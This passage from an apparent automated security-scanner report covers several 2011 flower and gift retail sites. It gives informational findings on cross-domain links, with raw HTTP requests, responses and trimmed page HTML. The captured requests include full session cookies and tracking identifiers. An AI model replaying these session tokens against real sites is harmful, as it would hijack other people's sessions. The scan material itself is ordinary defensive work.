<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1 HTTP/1.1
Host: track.searchignite.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 09 May 2011 01:00:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&amp;jscript=1&amp;u=">here</a>.</h2>
</body>
...[SNIP]...
16.21. http://ww30.1800baskets.com/deliverycalendarnew.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
...[SNIP]...
<span class="calNavText"><img alt="Previous" src="http://media3.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/calarrowsleft.gif" border="0" /></span>
...[SNIP]...
<span class="calNavText"><img alt="Next" src="http://media3.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/calarrowsright.gif" border="0"/></span>
...[SNIP]...
<span id="shipMessageFed" class="shipMsg"><img src="http://media2.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/shipping_ups.jpg" /></span>
                           <span id="shipMessage" class="shipMsg"><img src="http://media2.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/shipping_florist.jpg" /></span>
...[SNIP]...
16.22. http://ww30.1800baskets.com/product.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:19 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83726


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<meta property="og:type" content="product_service"/>

   
<link rel="image_src" href="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg" />    
<!-- /*Defect Id:INC000000351640 User:201815 Date:Sep-29-2010 Reason:Meta Tag Change Start*/ -->
...[SNIP]...
<link rel="canonical" href="http://www.1800baskets.com/product.do?baseCode=93260" />

<link rel="shortcut icon" href="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>


<!-- global css zone -->
...[SNIP]...
</style>
<script src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=rotate&amp;publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&amp;headerbg=%23669933&amp;linkfg=%23663399&amp;offsetLeft=-155&amp;embeds=true&amp;button=false&amp;onmouseover=false" type="text/javascript"></script>
...[SNIP]...
</script>


<link rel="stylesheet" type="text/css" href="http://media6.1800flowers.com/800f_assets/jet/website/styles/baskets/triadbannerpp.css"/>


</head>
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="https://ww30.1800baskets.com/customerwelcome.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://ww30.1800baskets.com/ordertracking.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow">
       <img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon-cart.gif" alt="Shopping Cart" border="0"/>
       </a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/btn-hdr-checkout.gif" alt="checkout" border="0"/></a>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
<div id="enlargeImgHide" onMouseOut="hideObject('enlargeImg')">

<img
name="bigimage"
src="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg"
border="0" alt="Popcorn Snack Tin - 1800baskets.com" />
</div>
...[SNIP]...
<td valign="top" id="trsHeader">


<img border="0" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/datasetdefaultleft_spacer.gif" />

</td>
...[SNIP]...
<td valign="top" id="trsHeader">


<img border="0" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/datasetdefaultright_spacer.gif" />

</td>
...[SNIP]...
<div class="trsProductImage">

<img id="prodimg"
name="prodimg"
src="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg"
alt="Popcorn Snack Tin - 1800baskets.com" /></div>
...[SNIP]...
');"
id="calendarLink" class="calendarImage">
<img
src="http://media2.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/calendar.jpg"
alt="Calendar" width="16" height="16" border="0" /> </a>
...[SNIP]...
<td align="left" style="padding-top: 10px; padding-right:8px;"> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/spacer.gif"
height="10" /><br />
...[SNIP]...
<br />
<img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/spacer.gif" height="10" />
</td>
...[SNIP]...
<a
id="verify" name="verify" href="javascript:checkNSubmit(false)"><img
src="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/btn_addtobasket.gif"
border="0" id="btnAddToBasket" /></a>
...[SNIP]...
<a id="verifyd"
name="verifyd"><img
src="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/btn_addtobasket_gray.gif"
border="0" id="btnAddToBasket" /></a>
...[SNIP]...
<input value="0" name="Tab_1_state" type="hidden">
<link rel="stylesheet" type="text/css" href="http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css"/>

<table id="Tab_1_table" border="0" cellSpacing="0" cellPadding="0" class="gui-tab" width="100%">
...[SNIP]...
<div id = "prodMOP7" class = "prodMOP7">
                   <img src="http://a764.g.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon_guarantee_new.gif" border="0" />
               </div>
...[SNIP]...
<a href="http://ww30.1800baskets.com/product.do?baseCode=91637&cm_cid=r">
               <img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/91637Lt.jpg" border="0" width="49" height="54" /></a>
...[SNIP]...
<div class="trsFooterLinks">
<a class="footerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9000" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9004" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://affiliateprogram.1800flowers.com" target="_self" rank="">Affiliate Program</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11088" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11117" target="_self" rank="">
...[SNIP]...
</a> - Send us <a class="copylink" href="http://vovici.com/wsb.dll/s/2b42g408c4" rel="nofollow" target="_blank">Feedback on this Site</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="http://media6.1800flowers.com/800f_assets/jet/website/scripts/flowers/product_apr7.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media5.1800flowers.com/800f_assets/jet/website/scripts/flowers/martha-tab_aug2.js"></script>
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript"></script>
...[SNIP]...
<noscript><img
   src="https://link.mercent.com/image.ashx?merchantID=OneEHFlowers"
   style="display: none"></noscript>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
<!-- End LP Custom Variables-->


<iframe frameborder="0" width="0" height="0" src="http://adsfac.us/pct_mx.asp?L=305608&source=if"></iframe>
<img src="http://xcdn.xgraph.net/17572/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=product" width="1" height="1" />


</body>
...[SNIP]...
16.23. http://ww30.1800baskets.com/template.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
<link rel="canonical" href="http://www.1800baskets.com/template.do?id=template3&page=2000" />

<link rel="shortcut icon" href="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>


<!-- global css zone -->
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="https://ww30.1800baskets.com/customerwelcome.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://ww30.1800baskets.com/ordertracking.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow">
<img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon-cart.gif" alt="Shopping Cart" border="0"/>
</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/btn-hdr-checkout.gif" alt="checkout" border="0"/></a>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
<td colspan="2" valign="top" align="center" zone="2">
           <link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_oct.css"/><style>
...[SNIP]...
<a href="../collection.do?dataset=11309&amp;tpfpb2=1" title="Birthday" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_01.png" alt="Birthday"/></a><a href="../collection.do?dataset=11312&amp;tpfpb3=1" title="Thank You" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_02.png" alt="Thank You" /></a><a href="../collection.do?dataset=11491&amp;tpfpb4=1" title="Get Well" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_03.png" alt="Get Well" /></a><a href="../collection.do?dataset=11315&amp;tpfpb5=1" title="Family Night" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_04.png" alt="Family Night"/></a><a href="../collection.do?dataset=11313&amp;tpfpb6=1" title="Bestsellers" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_05.png" alt="Bestsellers"/></a><a href="../collection.do?dataset=11316&amp;tpfpb7=1" title="Gifts Under $30" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_06.png" alt="Gifts Under $30"/></a><a href="../collection.do?dataset=11314&amp;tpfpb8=1" title="Sale" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_07.png" alt="Sale"/></a>
...[SNIP]...
<a href="../product.do?baseCode=93407&dataset=11086&tpfhero"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/TPFHero-050511.jpg" border="0" /></a>
...[SNIP]...
<a href="../product.do?baseCode=93406&dataset=11309&amp;tpfpromo1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-promo1-050411PM.jpg" border="0"/></a>
...[SNIP]...
<a href="../product.do?baseCode=94206&dataset=11086&amp;tpfpromo2"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-promo2-050511.jpg" border="0"/></a>
...[SNIP]...
<a href="../collection.do?dataset=11491&amp;f1h=1"><img alt="Holiday Preview" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/tpf-feature-getwell.gif" border="0" /></a><a href="../product.do?baseCode=93400&amp;dataset=11491"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93400.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11313&amp;tpfpb6=1"><img alt="Best Sellers" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-feature-best-sellers.gif" border="0" /></a><a href="../product.do?baseCode=94583&amp;dataset=11313"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/94583.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11309&amp;f3h=1"><img alt="Birthday" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/TPF-feature-holiday-birthday.gif" border="0" /></a><a href="../product.do?baseCode=93260&amp;dataset=11309"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052L.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11312&amp;f4h=1"><img alt="Thank You" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/tpf-feature-thankyou.gif" border="0" /></a><a href="../product.do?baseCode=94229&amp;dataset=11312"><img src="http://media1.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/94229.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<div class="trsFooterLinks">
<a class="footerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9000" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9004" target="_self" rank="">
